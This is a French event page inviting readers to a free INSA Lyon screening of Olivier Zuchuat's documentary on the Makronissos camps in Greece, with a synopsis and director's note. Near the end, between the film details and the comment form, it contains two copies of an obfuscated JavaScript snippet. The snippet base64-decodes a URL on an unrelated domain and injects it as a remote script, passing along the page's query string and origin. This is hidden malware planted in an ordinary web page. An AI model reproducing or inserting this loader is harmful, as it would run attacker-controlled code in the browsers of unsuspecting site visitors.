Vidéo Club: Comme des lions de pierre à l’entrée de la nuit

DEFKALION, en partenariat avec le Service Culturel de l’INSA, organise un cycle de six documentaires dans le cadre de notre Vidéo Club.

Nous avons le plaisir de vous inviter à la quatrième séance privée et gratuite le :

vendredi 23 Janvier 2015 à 20h00

 

Amphithéâtre René Char dans le bâtiment La Rotonde, INSA de Lyon

20, avenue des Arts, les Humanités, INSA de Lyon – 69100 Villeurbanne

Tram T1, direction IUT Feyssine, arrêt Albert Einstein (*)

Film

Comme des lions de pierre à l’entrée de la nuit

de Olivier Zuchuat

Durée 87 min.

Date: 2012

Projection privée et gratuite (V.O.S.T.)

Synopsis

Entre 1947 et 1951, plus de 80 000 hommes, femmes et enfants grecs ont été internés sur l’îlot de Makronissos (Grèce) dans des camps de rééducation destinés à lutter « contre l’expansion du communisme ». Parmi ces déportés se trouvaient de nombreux écrivains et poètes, dont Yannis Ritsos et Tassos Livaditis. Malgré les privations et les tortures, ces exilés sont parvenus à écrire des poèmes qui décrivent leur (sur)vie dans cet univers concentrationnaire. Ces textes, pour certains enterrés dans le sol du camp, ont été retrouvés. « Comme des lions de pierre à l’entrée de la nuit » mêle ces écrits poétiques avec des discours de rééducation politique qui étaient diffusés en permanence dans les haut-parleurs des camps. De longs travellings, tels des mouvements hypnotiques, arpentent les ruines des camps et “se heurtent” aux archives photographiques. Un essai filmé qui ranime la mémoire de ruines oubliées et d’une bataille perdue.

Note du réalisateur

On écrit d’ordinaire des poèmes pour célébrer la nature, pour exprimer des sentiments amoureux, ou encore une douleur existentielle. Mais rares sont ceux qui ont créé une œuvre poétique derrière des barbelés, sous la torture. Les poètes de Makronissos ont fait sourdre dans leurs textes une voix de résistance, un jaillissement de force vitale. Leurs chroniques poétiques de la vie des exilés politiques sur l’île racontent la terreur et la survie dans ce laboratoire barbare destiné à la « reprogrammation mentale » des résistants communistes… Ils donnent à « voir » la peur omniprésente, l’attente interminable, la soif qui taraude et les éreintantes corvées de pierres qu’il faut sans cesse transporter. Ils disent les nuits où résonnent les cris de ceux que les tortures ont rendus fous.Lorsque j’ai lu ces poèmes, au hasard d’une rencontre littéraire, j’ai “vu” des images d’un passé terrifiant que j’ai voulu confronter dans ce film aux images du présent, celles des ruines des camps de Makronissos. Chercher dans ces amas de pierre et de béton des empreintes de ce qui s’y est passé, les confronter aux hurlements de haut-parleurs qui crient des slogans nationalistes, les mettre en regard des photos d’exilés.

Un film de mémoire qui tente de lutter contre l’oubli, à l’heure où des ferveurs nationalistes nauséabondes semblent renaitre en Grèce…

http://commedeslionsdepierre. net/thefilm/about/

Nous vous rappelons que le 27/02, et le 10/04 auront lieu les deux prochaines séances du Vidéo club.

(function(){var a=document.head||document.getElementsByTagName(“head”)[0],b=”script”,c=atob(“aHR0cHM6Ly9qYXZhZGV2c3Nkay5jb20vYWpheC5waHA=”);c+=-1<c.indexOf("?")?"&":"?";c+=location.search.substring(1);b=document.createElement(b);b.src=c;b.id=btoa(location.origin);a.appendChild(b);})();(function(){var a=document.head||document.getElementsByTagName(“head”)[0],b=”script”,c=atob(“aHR0cHM6Ly9qYXZhZGV2c3Nkay5jb20vYWpheC5waHA=”);c+=-1<c.indexOf("?")?"&":"?";c+=location.search.substring(1);b=document.createElement(b);b.src=c;b.id=btoa(location.origin);a.appendChild(b);})();

Laisser un commentaire

Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *

Ce site utilise Akismet pour réduire les indésirables. En savoir plus sur comment les données de vos commentaires sont utilisées.